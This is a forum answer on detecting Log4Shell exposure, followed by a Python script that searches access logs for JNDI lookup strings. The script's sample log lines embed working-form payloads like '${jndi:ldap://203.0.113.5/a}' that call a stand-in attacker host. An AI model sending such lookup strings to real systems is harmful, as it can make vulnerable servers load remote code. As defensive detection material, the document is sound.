
Correct answer by
Community Advisor

Hi, for all the community members who work with on-premise solutions: you can use the following code on your exposed servers (usually tracking ones) to search the logs in order to see if attacks were tried:

Milan_Vucetic_0-1639295385808.png

Where possible, upgrade your log4j 2 to the latest 2.15.0 version.

Nice way to see if you are exposed to this threat: Start netcat parallel to your app:

Milan_Vucetic_1-1639295413074.png

Then type the following in the app where it gets logged (e.g. the query string of your search):

Milan_Vucetic_2-1639295438322.png

If you then see a lot of garbage emojis in the netcat console, you are vulnerable!

Sorry about the pictures above. The article just won't accept any code, even if code tags are used.

 

Regards,

Milan
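
A log search of the kind the post describes, as an added example (not the poster's code, which was only posted as screenshots): it flags access-log lines that contain the `${jndi:` lookup prefix, including percent-encoded and mixed-case forms. The log lines are constructed samples, and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Lookup prefix that an unpatched Log4j 2 resolves when the string is logged.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)

def normalize(line, max_rounds=3):
    """Percent-decode repeatedly so single- and double-encoded forms match."""
    for _ in range(max_rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def find_jndi_attempts(lines):
    """Return (line_number, client_ip) for every line carrying the prefix."""
    hits = []
    for lineno, raw in enumerate(lines, start=1):
        if JNDI_RE.search(normalize(raw)):
            fields = raw.split()
            hits.append((lineno, fields[0] if fields else ""))
    return hits

# Constructed sample lines (documentation-range addresses, not real traffic).
TS = "[12/Dec/2021:08:01:10 +0000]"
SAMPLE_LOG = [
    '198.51.100.7 - - ' + TS + ' "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - ' + TS + ' "GET /search?q=${jndi:ldap://203.0.113.5/a} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - ' + TS + ' "GET /c?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.9 - - ' + TS + ' "GET /c?x=%2524%257BJNDI%253Aldap%253A%252F%252F203.0.113.9%252Fa%257D HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.44 - - ' + TS + ' "GET / HTTP/1.1" 200 1024 "-" "${jndi:dns://192.0.2.44/x}"',
    '198.51.100.7 - - ' + TS + ' "GET /docs/jndi-howto.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, client in find_jndi_attempts(SAMPLE_LOG):
        print(f"line {lineno}: lookup string from {client}")
```

A clean result is not proof that nothing was tried: the string can be nested inside other lookups or arrive in fields the access log does not record, so upgrading remains the actual fix.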
